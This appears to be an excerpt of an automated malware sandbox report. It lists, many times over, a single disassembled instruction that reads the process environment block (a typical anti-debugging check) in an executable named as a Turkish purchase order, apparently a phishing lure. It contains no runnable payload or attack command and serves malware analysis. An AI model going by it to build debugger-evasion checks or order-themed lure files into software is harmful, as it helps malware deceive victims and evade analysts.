Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01468350 mov ecx, dword ptr fs:[00000030h]	5_2_01468350
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144035C mov eax, dword ptr fs:[00000030h]	5_2_0144035C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144035C mov eax, dword ptr fs:[00000030h]	5_2_0144035C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144035C mov eax, dword ptr fs:[00000030h]	5_2_0144035C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144035C mov ecx, dword ptr fs:[00000030h]	5_2_0144035C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144035C mov eax, dword ptr fs:[00000030h]	5_2_0144035C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144035C mov eax, dword ptr fs:[00000030h]	5_2_0144035C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148A352 mov eax, dword ptr fs:[00000030h]	5_2_0148A352
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BC310 mov ecx, dword ptr fs:[00000030h]	5_2_013BC310
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E0310 mov ecx, dword ptr fs:[00000030h]	5_2_013E0310
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FA30B mov eax, dword ptr fs:[00000030h]	5_2_013FA30B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FA30B mov eax, dword ptr fs:[00000030h]	5_2_013FA30B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FA30B mov eax, dword ptr fs:[00000030h]	5_2_013FA30B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146437C mov eax, dword ptr fs:[00000030h]	5_2_0146437C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014463C0 mov eax, dword ptr fs:[00000030h]	5_2_014463C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0147C3CD mov eax, dword ptr fs:[00000030h]	5_2_0147C3CD
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014643D4 mov eax, dword ptr fs:[00000030h]	5_2_014643D4
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014643D4 mov eax, dword ptr fs:[00000030h]	5_2_014643D4
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E3DB mov eax, dword ptr fs:[00000030h]	5_2_0146E3DB
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E3DB mov eax, dword ptr fs:[00000030h]	5_2_0146E3DB
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E3DB mov ecx, dword ptr fs:[00000030h]	5_2_0146E3DB
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E3DB mov eax, dword ptr fs:[00000030h]	5_2_0146E3DB
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013B8397 mov eax, dword ptr fs:[00000030h]	5_2_013B8397
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013B8397 mov eax, dword ptr fs:[00000030h]	5_2_013B8397
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013B8397 mov eax, dword ptr fs:[00000030h]	5_2_013B8397
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E438F mov eax, dword ptr fs:[00000030h]	5_2_013E438F
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E438F mov eax, dword ptr fs:[00000030h]	5_2_013E438F
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BE388 mov eax, dword ptr fs:[00000030h]	5_2_013BE388
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BE388 mov eax, dword ptr fs:[00000030h]	5_2_013BE388
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BE388 mov eax, dword ptr fs:[00000030h]	5_2_013BE388
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F63FF mov eax, dword ptr fs:[00000030h]	5_2_013F63FF
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DE3F0 mov eax, dword ptr fs:[00000030h]	5_2_013DE3F0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DE3F0 mov eax, dword ptr fs:[00000030h]	5_2_013DE3F0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DE3F0 mov eax, dword ptr fs:[00000030h]	5_2_013DE3F0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D03E9 mov eax, dword ptr fs:[00000030h]	5_2_013D03E9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D03E9 mov eax, dword ptr fs:[00000030h]	5_2_013D03E9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D03E9 mov eax, dword ptr fs:[00000030h]	5_2_013D03E9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D03E9 mov eax, dword ptr fs:[00000030h]	5_2_013D03E9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D03E9 mov eax, dword ptr fs:[00000030h]	5_2_013D03E9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D03E9 mov eax, dword ptr fs:[00000030h]	5_2_013D03E9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D03E9 mov eax, dword ptr fs:[00000030h]	5_2_013D03E9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D03E9 mov eax, dword ptr fs:[00000030h]	5_2_013D03E9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA3C0 mov eax, dword ptr fs:[00000030h]	5_2_013CA3C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA3C0 mov eax, dword ptr fs:[00000030h]	5_2_013CA3C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA3C0 mov eax, dword ptr fs:[00000030h]	5_2_013CA3C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA3C0 mov eax, dword ptr fs:[00000030h]	5_2_013CA3C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA3C0 mov eax, dword ptr fs:[00000030h]	5_2_013CA3C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA3C0 mov eax, dword ptr fs:[00000030h]	5_2_013CA3C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C83C0 mov eax, dword ptr fs:[00000030h]	5_2_013C83C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C83C0 mov eax, dword ptr fs:[00000030h]	5_2_013C83C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C83C0 mov eax, dword ptr fs:[00000030h]	5_2_013C83C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C83C0 mov eax, dword ptr fs:[00000030h]	5_2_013C83C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013B823B mov eax, dword ptr fs:[00000030h]	5_2_013B823B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01448243 mov eax, dword ptr fs:[00000030h]	5_2_01448243
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01448243 mov ecx, dword ptr fs:[00000030h]	5_2_01448243
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0147A250 mov eax, dword ptr fs:[00000030h]	5_2_0147A250
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0147A250 mov eax, dword ptr fs:[00000030h]	5_2_0147A250
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274 mov eax, dword ptr fs:[00000030h]	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274 mov eax, dword ptr fs:[00000030h]	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274 mov eax, dword ptr fs:[00000030h]	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274 mov eax, dword ptr fs:[00000030h]	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274 mov eax, dword ptr fs:[00000030h]	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274 mov eax, dword ptr fs:[00000030h]	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274 mov eax, dword ptr fs:[00000030h]	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274 mov eax, dword ptr fs:[00000030h]	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274 mov eax, dword ptr fs:[00000030h]	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274 mov eax, dword ptr fs:[00000030h]	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274 mov eax, dword ptr fs:[00000030h]	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274 mov eax, dword ptr fs:[00000030h]	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013B826B mov eax, dword ptr fs:[00000030h]	5_2_013B826B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C4260 mov eax, dword ptr fs:[00000030h]	5_2_013C4260
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C4260 mov eax, dword ptr fs:[00000030h]	5_2_013C4260
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C4260 mov eax, dword ptr fs:[00000030h]	5_2_013C4260
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C6259 mov eax, dword ptr fs:[00000030h]	5_2_013C6259
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BA250 mov eax, dword ptr fs:[00000030h]	5_2_013BA250
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D02A0 mov eax, dword ptr fs:[00000030h]	5_2_013D02A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D02A0 mov eax, dword ptr fs:[00000030h]	5_2_013D02A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE284 mov eax, dword ptr fs:[00000030h]	5_2_013FE284
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE284 mov eax, dword ptr fs:[00000030h]	5_2_013FE284
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01440283 mov eax, dword ptr fs:[00000030h]	5_2_01440283
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01440283 mov eax, dword ptr fs:[00000030h]	5_2_01440283
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01440283 mov eax, dword ptr fs:[00000030h]	5_2_01440283
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D02E1 mov eax, dword ptr fs:[00000030h]	5_2_013D02E1
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D02E1 mov eax, dword ptr fs:[00000030h]	5_2_013D02E1
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D02E1 mov eax, dword ptr fs:[00000030h]	5_2_013D02E1
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014562A0 mov eax, dword ptr fs:[00000030h]	5_2_014562A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014562A0 mov ecx, dword ptr fs:[00000030h]	5_2_014562A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014562A0 mov eax, dword ptr fs:[00000030h]	5_2_014562A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014562A0 mov eax, dword ptr fs:[00000030h]	5_2_014562A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014562A0 mov eax, dword ptr fs:[00000030h]	5_2_014562A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014562A0 mov eax, dword ptr fs:[00000030h]	5_2_014562A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA2C3 mov eax, dword ptr fs:[00000030h]	5_2_013CA2C3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA2C3 mov eax, dword ptr fs:[00000030h]	5_2_013CA2C3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA2C3 mov eax, dword ptr fs:[00000030h]	5_2_013CA2C3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA2C3 mov eax, dword ptr fs:[00000030h]	5_2_013CA2C3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CA2C3 mov eax, dword ptr fs:[00000030h]	5_2_013CA2C3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE53E mov eax, dword ptr fs:[00000030h]	5_2_013EE53E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE53E mov eax, dword ptr fs:[00000030h]	5_2_013EE53E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE53E mov eax, dword ptr fs:[00000030h]	5_2_013EE53E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE53E mov eax, dword ptr fs:[00000030h]	5_2_013EE53E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE53E mov eax, dword ptr fs:[00000030h]	5_2_013EE53E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0535 mov eax, dword ptr fs:[00000030h]	5_2_013D0535
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0535 mov eax, dword ptr fs:[00000030h]	5_2_013D0535
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0535 mov eax, dword ptr fs:[00000030h]	5_2_013D0535
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0535 mov eax, dword ptr fs:[00000030h]	5_2_013D0535
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0535 mov eax, dword ptr fs:[00000030h]	5_2_013D0535
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0535 mov eax, dword ptr fs:[00000030h]	5_2_013D0535
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01456500 mov eax, dword ptr fs:[00000030h]	5_2_01456500
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01494500 mov eax, dword ptr fs:[00000030h]	5_2_01494500
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01494500 mov eax, dword ptr fs:[00000030h]	5_2_01494500
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01494500 mov eax, dword ptr fs:[00000030h]	5_2_01494500
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01494500 mov eax, dword ptr fs:[00000030h]	5_2_01494500
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01494500 mov eax, dword ptr fs:[00000030h]	5_2_01494500
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01494500 mov eax, dword ptr fs:[00000030h]	5_2_01494500
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01494500 mov eax, dword ptr fs:[00000030h]	5_2_01494500
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F656A mov eax, dword ptr fs:[00000030h]	5_2_013F656A
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F656A mov eax, dword ptr fs:[00000030h]	5_2_013F656A
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F656A mov eax, dword ptr fs:[00000030h]	5_2_013F656A
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C8550 mov eax, dword ptr fs:[00000030h]	5_2_013C8550
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C8550 mov eax, dword ptr fs:[00000030h]	5_2_013C8550
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E45B1 mov eax, dword ptr fs:[00000030h]	5_2_013E45B1
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E45B1 mov eax, dword ptr fs:[00000030h]	5_2_013E45B1
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE59C mov eax, dword ptr fs:[00000030h]	5_2_013FE59C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F4588 mov eax, dword ptr fs:[00000030h]	5_2_013F4588
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C2582 mov eax, dword ptr fs:[00000030h]	5_2_013C2582
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C2582 mov ecx, dword ptr fs:[00000030h]	5_2_013C2582
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FC5ED mov eax, dword ptr fs:[00000030h]	5_2_013FC5ED
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FC5ED mov eax, dword ptr fs:[00000030h]	5_2_013FC5ED
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_013EE5E7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_013EE5E7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_013EE5E7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_013EE5E7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_013EE5E7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_013EE5E7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_013EE5E7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_013EE5E7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C25E0 mov eax, dword ptr fs:[00000030h]	5_2_013C25E0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014405A7 mov eax, dword ptr fs:[00000030h]	5_2_014405A7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014405A7 mov eax, dword ptr fs:[00000030h]	5_2_014405A7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014405A7 mov eax, dword ptr fs:[00000030h]	5_2_014405A7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C65D0 mov eax, dword ptr fs:[00000030h]	5_2_013C65D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FA5D0 mov eax, dword ptr fs:[00000030h]	5_2_013FA5D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FA5D0 mov eax, dword ptr fs:[00000030h]	5_2_013FA5D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE5CF mov eax, dword ptr fs:[00000030h]	5_2_013FE5CF
